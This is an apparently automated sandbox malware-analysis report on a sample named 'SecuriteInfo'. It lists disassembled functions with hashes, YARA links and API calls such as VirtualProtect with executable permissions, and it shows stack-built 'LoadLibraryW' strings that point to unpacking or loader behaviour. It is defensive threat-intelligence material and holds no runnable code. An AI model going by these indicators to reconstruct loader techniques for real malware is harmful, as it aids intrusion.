                                                                          • Opcode ID: 55985e206bfc0ab8e65a1af142fcae8adabb03649b6278b40506864bd8b521af
                                                                          • Instruction ID: ba45a05d2a30f870e35e0d919e71ca49be148b13dc0d4d89b02a0f9eae912a30
                                                                          • Opcode Fuzzy Hash: 55985e206bfc0ab8e65a1af142fcae8adabb03649b6278b40506864bd8b521af
                                                                          • Instruction Fuzzy Hash: 6EA1E1B1D081599FE7248B14DC44BEABBB5FF90314F1480FAD40DA6245E7789EC58F52
                                                                          Function 0087BC13 Relevance: 2.7, Strings: 2, Instructions: 246COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886701827.0000000000852000.00000040.00000001.01000000.00000003.sdmp, Offset: 00852000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_852000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: NHAE$_R
                                                                          • API String ID: 0-3206149426
                                                                          • Opcode ID: 51f1c118715c63727899fcdf615c1de0fdf85c5773f403c6f2e856e2734e878c
                                                                          • Instruction ID: 7288ba8de120504b0b2fb217294a2d706369d4ed7fea6e8d2add1fc3df101092
                                                                          • Opcode Fuzzy Hash: 51f1c118715c63727899fcdf615c1de0fdf85c5773f403c6f2e856e2734e878c
                                                                          • Instruction Fuzzy Hash: 2491D3B1D082A89EEB208B24CC447EA7BB5FF91314F1480FAD44DA6245D7789FC58F52
                                                                          Function 004B323E Relevance: 1.8, APIs: 1, Instructions: 341nativeCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • NtQueryDefaultLocale.NTDLL(00000001,?), ref: 004B35D7
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886280803.00000000004A4000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A4000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_4a4000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: DefaultLocaleQuery
                                                                          • String ID:
                                                                          • API String ID: 2949231068-0
                                                                          • Opcode ID: dd0959d3ac9439c6e66a1398d537d11a50fca2fa231a72a5e0f29d4380da5fc4
                                                                          • Instruction ID: 5cff7e20590e96420e9e837944efece030117bdd8532d668de264777dee9246d
                                                                          • Opcode Fuzzy Hash: dd0959d3ac9439c6e66a1398d537d11a50fca2fa231a72a5e0f29d4380da5fc4
                                                                          • Instruction Fuzzy Hash: 76E17AB5D042288BEB24CE25CC90BEAB7B5EF94305F1441EAD40DA7281E739AED18F55
                                                                          Function 008997CE Relevance: 1.7, APIs: 1, Instructions: 237COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886760940.0000000000884000.00000040.00000001.01000000.00000003.sdmp, Offset: 00884000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_884000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: ProtectVirtual
                                                                          • String ID:
                                                                          • API String ID: 544645111-0
                                                                          • Opcode ID: c14029486e0011a938abf89c52cd395a291440da30a797f13b8f33d676c3cde2
                                                                          • Instruction ID: 2358311fb1116000c043c7d0191ce8fa760988359e5e4b2c8a32969a1d34f9f6
                                                                          • Opcode Fuzzy Hash: c14029486e0011a938abf89c52cd395a291440da30a797f13b8f33d676c3cde2
                                                                          • Instruction Fuzzy Hash: 2D9104B1D046689FEB249B28CC447FA7775FB81315F1841FEE44EAA680E7394EC1CA52
                                                                          Function 00852786 Relevance: 1.7, APIs: 1, Instructions: 194memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 00852B12
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886701827.0000000000852000.00000040.00000001.01000000.00000003.sdmp, Offset: 00852000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_852000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: ProtectVirtual
                                                                          • String ID:
                                                                          • API String ID: 544645111-0
                                                                          • Opcode ID: 06231b7213b3b135dca516c4c8bd7012eda4f7a7a19e6028b2ed182a3c56d3a4
                                                                          • Instruction ID: 28822de1b45158cc7925f5d303a1e0186972ffbad05eb0a83b8f9df679bad30f
                                                                          • Opcode Fuzzy Hash: 06231b7213b3b135dca516c4c8bd7012eda4f7a7a19e6028b2ed182a3c56d3a4
                                                                          • Instruction Fuzzy Hash: B0913570E046298FDB29CF14CD94BAABBB5FB85306F1481EAD949A7341CA346EC5CF50
                                                                          Function 00867A51 Relevance: 1.7, APIs: 1, Instructions: 188memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • VirtualProtect.KERNELBASE(?,?,00000040,FFFFAC50), ref: 0086865A
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886701827.0000000000852000.00000040.00000001.01000000.00000003.sdmp, Offset: 00852000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_852000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: ProtectVirtual
                                                                          • String ID:
                                                                          • API String ID: 544645111-0
                                                                          • Opcode ID: 45c5331e40ff8744fa664ca27ae6b165c0e5d42430d740282b95b60e7d183e4d
                                                                          • Instruction ID: 0ee1d56bb1ccbccfec81fc236bea30620057f532d27a975df2ff496db117ad02
                                                                          • Opcode Fuzzy Hash: 45c5331e40ff8744fa664ca27ae6b165c0e5d42430d740282b95b60e7d183e4d
                                                                          • Instruction Fuzzy Hash: 5E6102B2C085299BEB248B24DC48BFBB775FF54304F1581FAD80DA6640E6785BC58B92
                                                                          Function 004B305B Relevance: 1.7, APIs: 1, Instructions: 179COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886280803.00000000004A4000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A4000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_4a4000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: DefaultLocaleQuery
                                                                          • String ID:
                                                                          • API String ID: 2949231068-0
                                                                          • Opcode ID: c8eaa0244a04639ff839bf771c3cb5706333ff9b7b4d6fb3ffd42478c667f14f
                                                                          • Instruction ID: 5eb406d8fa2b0ba876403ad4381f42626fd28fdcc7391680f0314d77f651548e
                                                                          • Opcode Fuzzy Hash: c8eaa0244a04639ff839bf771c3cb5706333ff9b7b4d6fb3ffd42478c667f14f
                                                                          • Instruction Fuzzy Hash: D161E0B1D012688FEB24CF25DD44BEAB779EF40306F1081FAD80DA2644E6785FC18E66
                                                                          Function 004B3DAB Relevance: 1.6, APIs: 1, Instructions: 147COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886280803.00000000004A4000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A4000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_4a4000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: ee0cc81e03a3e3e0f96ff0cd04e9a4a7777ebb4f99ebf07cf61579f04f003137
                                                                          • Instruction ID: 1f67d60c764271bf4744f646f58de9bcfda1976ccbbceb3ae1e0d8f1e26cfc5c
                                                                          • Opcode Fuzzy Hash: ee0cc81e03a3e3e0f96ff0cd04e9a4a7777ebb4f99ebf07cf61579f04f003137
                                                                          • Instruction Fuzzy Hash: 565136A2D082588EFB208F25DC54BFA7775EF84305F0480EED94D56686D2385FC68F22
                                                                          Function 004B30F3 Relevance: 1.6, APIs: 1, Instructions: 116nativeCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • NtQueryDefaultLocale.NTDLL(00000001,?), ref: 004B35D7
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886280803.00000000004A4000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A4000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_4a4000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: DefaultLocaleQuery
                                                                          • String ID:
                                                                          • API String ID: 2949231068-0
                                                                          • Opcode ID: d786799451f91f3f7f04210a9f3808064f8e009dac04228b433b63af472d3558
                                                                          • Instruction ID: fc48f622e8599c73779df4180ee26e68894e572ea58237ea9ef6fa9c0e80eb5d
                                                                          • Opcode Fuzzy Hash: d786799451f91f3f7f04210a9f3808064f8e009dac04228b433b63af472d3558
                                                                          • Instruction Fuzzy Hash: 7741B5B0D051388AEB248F26DC447FA77B9EF40306F1041EBE80996281E7785FD5CE26
                                                                          Function 004B3CFF Relevance: 1.6, APIs: 1, Instructions: 98nativeCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • NtQueryDefaultLocale.NTDLL(00000000,?), ref: 004B4B99
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886280803.00000000004A4000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A4000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_4a4000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: DefaultLocaleQuery
                                                                          • String ID:
                                                                          • API String ID: 2949231068-0
                                                                          • Opcode ID: ed924e8c82da8f69bd5bcce666b65986589a22a6642a840aa131b83f59e40771
                                                                          • Instruction ID: 0a5f6e6e6187889b3626142e83c04c9d85a1186e3f95da11b832c85c5a6e9884
                                                                          • Opcode Fuzzy Hash: ed924e8c82da8f69bd5bcce666b65986589a22a6642a840aa131b83f59e40771
                                                                          • Instruction Fuzzy Hash: 9A3138B1D086985EE7109F21CC98BE67B78EB80315F1481FFDA4946683C67C5A96CB32
                                                                          Function 004B3462 Relevance: 1.6, APIs: 1, Instructions: 92nativeCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • NtQueryDefaultLocale.NTDLL(00000001,?), ref: 004B35D7
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886280803.00000000004A4000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A4000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_4a4000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: DefaultLocaleQuery
                                                                          • String ID:
                                                                          • API String ID: 2949231068-0
                                                                          • Opcode ID: 40450e4d924050cdd36fde371bc6780303a71c7d97ca836985cec4665ebad97f
                                                                          • Instruction ID: dc4b9013adcf750a3b8d0dd09aff0b25a8ba7e4083fafee89901e8b968d5d8d3
                                                                          • Opcode Fuzzy Hash: 40450e4d924050cdd36fde371bc6780303a71c7d97ca836985cec4665ebad97f
                                                                          • Instruction Fuzzy Hash: 7A41C2B0E051A98BDB60CF15CC90BEE7BB6AF85316F1441EAD44DA2241DA389FD1CF15
                                                                          Function 0087B2D3 Relevance: 1.5, Strings: 1, Instructions: 288COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886701827.0000000000852000.00000040.00000001.01000000.00000003.sdmp, Offset: 00852000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_852000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: _R
                                                                          • API String ID: 0-4285093506
                                                                          • Opcode ID: 590c3ef7c4644c99029b26e3cb6be1e5c44186ac5e306239386144ee560dc9b2
                                                                          • Instruction ID: db6bf5324dd7701177a7cd20aae782a12687dafae1fad906da7776ffbb255326
                                                                          • Opcode Fuzzy Hash: 590c3ef7c4644c99029b26e3cb6be1e5c44186ac5e306239386144ee560dc9b2
                                                                          • Instruction Fuzzy Hash: 5BB1D1B1D042699BE7248B24DC547FABBB5FF41314F0480FAD44DA6285E3B89EC58B52
                                                                          Function 004B3553 Relevance: 1.5, APIs: 1, Instructions: 37nativeCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • NtQueryDefaultLocale.NTDLL(00000001,?), ref: 004B35D7
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886280803.00000000004A4000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A4000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_4a4000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: DefaultLocaleQuery
                                                                          • String ID:
                                                                          • API String ID: 2949231068-0
                                                                          • Opcode ID: 3564de2d3e902b148a49503b35dadf16ef2981d3308f578664ded007ca62db7e
                                                                          • Instruction ID: 0f9cd986809366abed5b298a8416a68edf8b367baff8de3b811da0e0ce9dadac
                                                                          • Opcode Fuzzy Hash: 3564de2d3e902b148a49503b35dadf16ef2981d3308f578664ded007ca62db7e
                                                                          • Instruction Fuzzy Hash: 90116DB4D052698ADB308F66CC947EDB7B0AB14316F0002DAD80DA6281E7745FC1CF16
                                                                          Function 004B4040 Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • NtQueryDefaultLocale.NTDLL(00000000,?), ref: 004B4B99
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886280803.00000000004A4000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A4000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_4a4000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: DefaultLocaleQuery
                                                                          • String ID:
                                                                          • API String ID: 2949231068-0
                                                                          • Opcode ID: 8c448b88e4e0074408337ed0f10e9d8ebc4b9d479747f19cf9a9ab7738c1382c
                                                                          • Instruction ID: 1bb83d90325f157b311f415aa0709ef8a6b19382b13e5ffa28c52fdd41266865
                                                                          • Opcode Fuzzy Hash: 8c448b88e4e0074408337ed0f10e9d8ebc4b9d479747f19cf9a9ab7738c1382c
                                                                          • Instruction Fuzzy Hash: C9E0CDB1D0828045F38096519C597E7366CDBD4311F1440EAD50D80183D7BCE6C58E33
                                                                          Function 0087B509 Relevance: 1.5, Strings: 1, Instructions: 247COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886701827.0000000000852000.00000040.00000001.01000000.00000003.sdmp, Offset: 00852000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_852000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: _R
                                                                          • API String ID: 0-4285093506
                                                                          • Opcode ID: d077e53401879d93ba946f0e1236ce3b923a8090875df624acab45441a3b8624
                                                                          • Instruction ID: f20a492f40d80bdd83f01b93d5655528874b32db089909c1cdfd444501b91691
                                                                          • Opcode Fuzzy Hash: d077e53401879d93ba946f0e1236ce3b923a8090875df624acab45441a3b8624
                                                                          • Instruction Fuzzy Hash: 229105B2D082699BE7248A24DC54BEBBB75FF50304F0480F9D40DA6285E7B89FC58F52
                                                                          Function 0087B7DA Relevance: 1.5, Strings: 1, Instructions: 235COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886701827.0000000000852000.00000040.00000001.01000000.00000003.sdmp, Offset: 00852000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_852000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: _R
                                                                          • API String ID: 0-4285093506
                                                                          • Opcode ID: fe3e3677abffc6e8712896bd437d0043d98a756485b88a3423a7b79e6f27c35e
                                                                          • Instruction ID: a7ecd6e3c9ade940388f36e590485fe5a8ef24541893aca897776f4d4eceb4b3
                                                                          • Opcode Fuzzy Hash: fe3e3677abffc6e8712896bd437d0043d98a756485b88a3423a7b79e6f27c35e
                                                                          • Instruction Fuzzy Hash: F49158B2D081989BE7248624DC84BEB7BBAFF41304F1880FAD44DA6245D7799FC48F52
                                                                          Function 0087BDD7 Relevance: 1.5, Strings: 1, Instructions: 227COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886701827.0000000000852000.00000040.00000001.01000000.00000003.sdmp, Offset: 00852000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_852000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: _R
                                                                          • API String ID: 0-4285093506
                                                                          • Opcode ID: c155b34f5b4109f1c76b6d2bf59c8b592f64566b903164780d0e2748a855db51
                                                                          • Instruction ID: 36539c657925b501c7d2c924c0e99f5325c88a8f3400421834b38e5eea1415c1
                                                                          • Opcode Fuzzy Hash: c155b34f5b4109f1c76b6d2bf59c8b592f64566b903164780d0e2748a855db51
                                                                          • Instruction Fuzzy Hash: DBA135B0D086A98FDB25CB14CC94BAABBB9FB44318F1481EAD50DA7245D7789FC18F41
                                                                          Function 008996AF Relevance: 24.7, APIs: 1, Strings: 13, Instructions: 152COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886760940.0000000000884000.00000040.00000001.01000000.00000003.sdmp, Offset: 00884000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_884000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: ProtectVirtual
                                                                          • String ID: 7F65$L$L$W$a$a$b$d$i$o$r$r$y
                                                                          • API String ID: 544645111-214950705
                                                                          • Opcode ID: d3c1b1ada7ad50d32c06205f887e7014bc64dbc9c778d898dca7b4927ccaa475
                                                                          • Instruction ID: 0059da33aa26880dbb6bde27d052e4931b2cb052224ed0676c5d11b4636075ae
                                                                          • Opcode Fuzzy Hash: d3c1b1ada7ad50d32c06205f887e7014bc64dbc9c778d898dca7b4927ccaa475
                                                                          • Instruction Fuzzy Hash: 94518EB1C08298DEFB15DA28CC487FA7B74EB52308F0841FED44D9A582D7795EC58B62
                                                                          Function 008676EA Relevance: 22.9, APIs: 1, Strings: 12, Instructions: 155memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • VirtualProtect.KERNELBASE(?,?,00000040,FFFFAC50), ref: 0086865A
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886701827.0000000000852000.00000040.00000001.01000000.00000003.sdmp, Offset: 00852000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_852000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: ProtectVirtual
                                                                          • String ID: L$L$W$a$a$b$d$i$o$r$r$y
                                                                          • API String ID: 544645111-4069139063
                                                                          • Opcode ID: 1be9211c0fc14a96e7f05906c5104ae20df3e5c890ca984bd0f8b73d4300fd44
                                                                          • Instruction ID: fad352c9fa01a5d4cb3be3afd0b91ca7a08f38783545d6525896dbb91366aa08
                                                                          • Opcode Fuzzy Hash: 1be9211c0fc14a96e7f05906c5104ae20df3e5c890ca984bd0f8b73d4300fd44
                                                                          • Instruction Fuzzy Hash: 735157F1C08298DEFB208614DC08BFB7A74FB51318F1941F9D50D9A681D6794FC59BA2
                                                                          Function 0083449E Relevance: 21.2, APIs: 1, Strings: 13, Instructions: 182COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 00835716
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886632592.000000000082E000.00000040.00000001.01000000.00000003.sdmp, Offset: 0082E000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_82e000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: FreeVirtual
                                                                          • String ID: KAL3$L$L$W$a$a$b$d$i$o$r$r$y
                                                                          • API String ID: 1263568516-1595411076
                                                                          • Opcode ID: 9e9041545dc9cbcd5dbe85f16ae75047561cd184ea836c72669372013b088e34
                                                                          • Instruction ID: 4d39759fdacc6b458643718b5f94b8164e2e275f5d063a7bbd925510a30cc63a
                                                                          • Opcode Fuzzy Hash: 9e9041545dc9cbcd5dbe85f16ae75047561cd184ea836c72669372013b088e34
                                                                          • Instruction Fuzzy Hash: 79711861E04298CAFB20CA24DC08BAA7679FF95314F1440F9D40DEB680D2BE5FC18F62
                                                                          Function 00834452 Relevance: 19.7, APIs: 1, Strings: 12, Instructions: 178COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 00835716
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886632592.000000000082E000.00000040.00000001.01000000.00000003.sdmp, Offset: 0082E000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_82e000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: FreeVirtual
                                                                          • String ID: L$L$W$a$a$b$d$i$o$r$r$y
                                                                          • API String ID: 1263568516-4069139063
                                                                          • Opcode ID: 40eedd5d6b6ad99b5012dff3796cff11443aed959b753ba7ebb58e06fa40e598
                                                                          • Instruction ID: 6143691065aba89d2a2e1b39f9e39df4d72c1008106048076cfc9aac56dfcd8a
                                                                          • Opcode Fuzzy Hash: 40eedd5d6b6ad99b5012dff3796cff11443aed959b753ba7ebb58e06fa40e598
                                                                          • Instruction Fuzzy Hash: 9871F6A1E05698CAFB20CA24DC04BAA7679FF95314F1440F9D40DE7680D2BE6FC48F62
                                                                          Function 008346A3 Relevance: 19.7, APIs: 1, Strings: 12, Instructions: 175COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 00835716
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886632592.000000000082E000.00000040.00000001.01000000.00000003.sdmp, Offset: 0082E000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_82e000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: FreeVirtual
                                                                          • String ID: L$L$W$a$a$b$d$i$o$r$r$y
                                                                          • API String ID: 1263568516-4069139063
                                                                          • Opcode ID: c0e5afc1e3ed3ad6e297159aba0df4b523f14829ac3976c94fad5838fefe5e78
                                                                          • Instruction ID: 5184b696468e9da7eb8b004d1fa5c283d7fd8d70b5350dd29f02dd8aa22dde36
                                                                          • Opcode Fuzzy Hash: c0e5afc1e3ed3ad6e297159aba0df4b523f14829ac3976c94fad5838fefe5e78
                                                                          • Instruction Fuzzy Hash: 1B6107A1E08698CAFB20CA24DC05BAA7679FF95310F1440F9D40DE7680D6BE5FC08F62
                                                                          Function 008346AE Relevance: 19.7, APIs: 1, Strings: 12, Instructions: 175COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 00835716
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886632592.000000000082E000.00000040.00000001.01000000.00000003.sdmp, Offset: 0082E000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_82e000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: FreeVirtual
                                                                          • String ID: L$L$W$a$a$b$d$i$o$r$r$y
                                                                          • API String ID: 1263568516-4069139063
                                                                          • Opcode ID: 5bfcb9cd07f060ba5d09f75855329921cf0bf687d74549b70057a3296e0706ab
                                                                          • Instruction ID: 9a4fc3c993aa973454a30a96b54f4c65138ae158df011a0f386ce5c5444bf70d
                                                                          • Opcode Fuzzy Hash: 5bfcb9cd07f060ba5d09f75855329921cf0bf687d74549b70057a3296e0706ab
                                                                          • Instruction Fuzzy Hash: 1D61F6A1E09698CAFB20C624DC05BAA7679FF95314F1440F9D40DEB680D6BE5FC08F62
                                                                          Function 0083446C Relevance: 19.7, APIs: 1, Strings: 12, Instructions: 172COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 00835716
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886632592.000000000082E000.00000040.00000001.01000000.00000003.sdmp, Offset: 0082E000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_82e000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: FreeVirtual
                                                                          • String ID: L$L$W$a$a$b$d$i$o$r$r$y
                                                                          • API String ID: 1263568516-4069139063
                                                                          • Opcode ID: f68dec47e87087453e393cf50804925c8a100504d49a9050a3009c5770eb206e
                                                                          • Instruction ID: 7271e0f75bae88ae49037c2565abfec8d1c2302a80223c341acd41316ed85694
                                                                          • Opcode Fuzzy Hash: f68dec47e87087453e393cf50804925c8a100504d49a9050a3009c5770eb206e
                                                                          • Instruction Fuzzy Hash: F361E461E09698CAFB21CA24DC04BAA7679FF95314F1440F9D40DEB680D2BE5FC48F62
                                                                          Function 0083480F Relevance: 19.6, APIs: 1, Strings: 12, Instructions: 119COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 00835716
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886632592.000000000082E000.00000040.00000001.01000000.00000003.sdmp, Offset: 0082E000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_82e000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: FreeVirtual
                                                                          • String ID: L$L$W$a$a$b$d$i$o$r$r$y
                                                                          • API String ID: 1263568516-4069139063
                                                                          • Opcode ID: 7d14002f7f4a415f88f270137efc34c86cd00203c3c8f07c2b1d1ca3ca6ed79b
                                                                          • Instruction ID: 95aafeab7d11af8c9f85e6677eab38fc53c3694cedca6fe4241c5dedfed698e4
                                                                          • Opcode Fuzzy Hash: 7d14002f7f4a415f88f270137efc34c86cd00203c3c8f07c2b1d1ca3ca6ed79b
                                                                          • Instruction Fuzzy Hash: D04118A1E05298DFFB218614DC09BAA7B79FB91714F1840F9D44DA6681C2FD9FC48F22
                                                                          Function 004BB7F9 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 348COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886280803.00000000004A4000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A4000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_4a4000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: GKG8$IF;8
                                                                          • API String ID: 0-4084355659
                                                                          • Opcode ID: 69a25eab343c366ad3034da5fe3ad41bfdc20bc9315382990102d573e64c06e9
                                                                          • Instruction ID: a23307967ed38e76170efc8c33dd6485655e04d8df34b7d1b5c70df7ea6a2ed3
                                                                          • Opcode Fuzzy Hash: 69a25eab343c366ad3034da5fe3ad41bfdc20bc9315382990102d573e64c06e9
                                                                          • Instruction Fuzzy Hash: 41E19EB5E042298BEB20CB15CC80BEEB775EF85304F1441EAD80967241DB799EC6CFA5
                                                                          Function 00845435 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 150memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • VirtualProtect.KERNELBASE(?,?,00000040,?,00845ADC,?,?,00845530,?,?,?,?,?,?,00000000,?), ref: 00845B21
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886676507.0000000000845000.00000040.00000001.01000000.00000003.sdmp, Offset: 00845000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_845000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: ProtectVirtual
                                                                          • String ID: XP
                                                                          • API String ID: 544645111-2561422682
                                                                          • Opcode ID: 289cea6c860bb11b3c26c5b3f6cb54a53b4bcfdd82d3f25d9880708124b0b452
                                                                          • Instruction ID: 875a631a594071d9780f069481238d9a58f050f95e3866554441e391e81ce787
                                                                          • Opcode Fuzzy Hash: 289cea6c860bb11b3c26c5b3f6cb54a53b4bcfdd82d3f25d9880708124b0b452
                                                                          • Instruction Fuzzy Hash: F651B1B1D0565CAFEB20CB14DC54BEA77B5EB89314F0441E9D40DAB241D2386EC1CF51
                                                                          Function 00845475 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 140memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • VirtualProtect.KERNELBASE(?,?,00000040,?,00845ADC,?,?,00845530,?,?,?,?,?,?,00000000,?), ref: 00845B21
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886676507.0000000000845000.00000040.00000001.01000000.00000003.sdmp, Offset: 00845000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_845000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: ProtectVirtual
                                                                          • String ID: XP
                                                                          • API String ID: 544645111-2561422682
